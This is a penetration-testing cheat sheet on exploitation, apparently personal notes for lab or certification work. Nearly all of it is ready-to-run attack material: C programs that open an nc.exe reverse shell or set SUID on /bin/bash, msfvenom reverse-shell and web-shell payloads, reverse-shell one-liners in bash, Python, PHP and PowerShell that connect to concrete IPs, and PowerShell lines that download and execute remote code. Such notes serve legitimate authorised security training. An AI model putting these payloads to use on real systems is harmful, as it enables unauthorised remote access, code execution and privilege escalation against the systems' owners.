13_exploitation.md

💣 Exploitation

Locating Public Exploits

# search for an exploit
searchsploit <name>

# show the exploit
searchsploit -x <id>

# copy the exploit to the current folder
searchsploit -m <id>

# NSE
locate .nse | grep <name>
nmap --script-help <name>

Compiling Exploits

Windows: reverse shell using nc.exe

#include <stdlib.h>

int main(){
    system("C:\\programdata\\nc.exe -e cmd.exe <ip> <port>");
    return 0;
}

Linux: add SUID bit to /bin/bash

#include <stdlib.h>

int main() {
    system("chmod +s /bin/bash");
    return 0;
}

=== "Windows"

```shell
sudo apt install mingw-w64
# 64-bit and 32-bit C++ files
x86_64-w64-mingw32-g++ myprogram.cpp -o myprogram.exe
i686-w64-mingw32-g++ myprogram.cpp -o myprogram.exe

# 64-bit and 32-bit C files
x86_64-w64-mingw32-gcc myprogram.c -o myprogram.exe
i686-w64-mingw32-gcc myprogram.c -o myprogram.exe
```

=== "Linux"

```shell
sudo apt install gcc g++ make
gcc myprogram.c -o myprogram
g++ myprogram.cpp -o myprogram
```

Reverse Shells

!!! tip Beware of reflected ports!

revshells.com

MSFVenom

# stageless x64 shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o reverse.exe
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf -o reverse.elf
# meterpreter staged shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o reverse.exe
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf -o reverse.elf


msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php

One liners

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

python -c 'import 
socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

<?php echo shell_exec('bash -i >& /dev/tcp/10.11.0.106/443 0>&1');?>

# powershell
# download and execute a file from memory
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"

$client = New-Object System.Net.Sockets.TCPClient("192.168.45.230",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Upgrade a Reverse Shell into a full TTY

Spawn a TTY Shell

# using Python
python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/sh")'

# if Python is not available
/bin/bash -i
script /dev/null -c bash

Background the shell and fix settings

# CTRL+Z
stty raw -echo; fg

Set terminal env variables

reset xterm
export TERM=xterm
export SHELL=bash
stty rows 40 columns 100

Add tools to Windows restricted shell

set PATH=%PATH%;C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0\;

Better listener with rlwrap

rlwrap nc -lnvp 4444

Penelope

If the fully interactive shell can't be achieved and it's impossible to edit a file, penelope can help.

python penelope.py 80

Powercat

https://github.com/besimorhino/powercat

# load the function from .ps1 file:
.\powercat.ps1
# load the function from a URL and connect back to the listener:
IEX (New-Object System.Net.WebClient).DownloadString('http://<ip>:<port>/powercat.ps1'); powercat -c <ip> -p <port> -e cmd

Check Connectivity

# on Kali
sudo tcpdump -i tun0 icmp

# from the target
ping -c 1 <kali_ip>